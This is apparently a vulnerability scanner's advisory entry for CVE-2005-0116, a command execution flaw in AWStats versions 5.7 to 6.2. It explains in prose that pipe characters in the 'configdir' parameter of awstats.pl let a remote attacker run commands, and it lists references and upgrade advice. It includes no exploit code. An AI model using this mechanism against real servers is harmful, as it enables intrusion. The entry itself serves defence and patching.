| VID |
21529 |
| Severity |
40 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
CGI |
| Detailed Description |
The AWStats is vulnerable to an arbitrary command execution vulnerability in the configdir parameter. AWStats is a freely available log analyzer that collects and graphically displays statistics from web, FTP, and mail servers. AWStats versions 5.7 through 6.2 could allow a remote attacker to execute arbitrary commands on the system, caused by improper filtering of user-supplied input in the 'configdir' parameter in the 'awstats.pl' script. By sending a specially-crafted request containing commands with the '|' characters in the 'configdir' parameter of the 'awstats.pl' script, a remote attacker could execute arbitrary commands on the system with privileges of the Web server.
* References:
http://www.ciac.org/ciac/bulletins/p-140.shtml
http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities
http://www.kb.cert.org/vuls/id/272296
http://secunia.com/advisories/13893/
* Platforms Affected:
AWStats versions 5.7 through 6.2
Any operating system Any version |
| Recommendation |
Upgrade to the latest version of AWStats (6.4 or later), available from the AWStats Download Web page at http://awstats.sourceforge.net/#DOWNLOAD
For Debian GNU/Linux 3.0 (woody):
Upgrade to the latest version of awstats (4.0-0.woody.2 or later), as listed in Debian Security Advisory DSA-682-1 at http://www.debian.org/security/2005/dsa-682
For other distributions:
Contact your vendor for upgrade or patch information. |
| Related URL |
CVE-2005-0116 (CVE) |
| Related URL |
12270,12298 (SecurityFocus) |
| Related URL |
18912,19058 (ISS) |
|
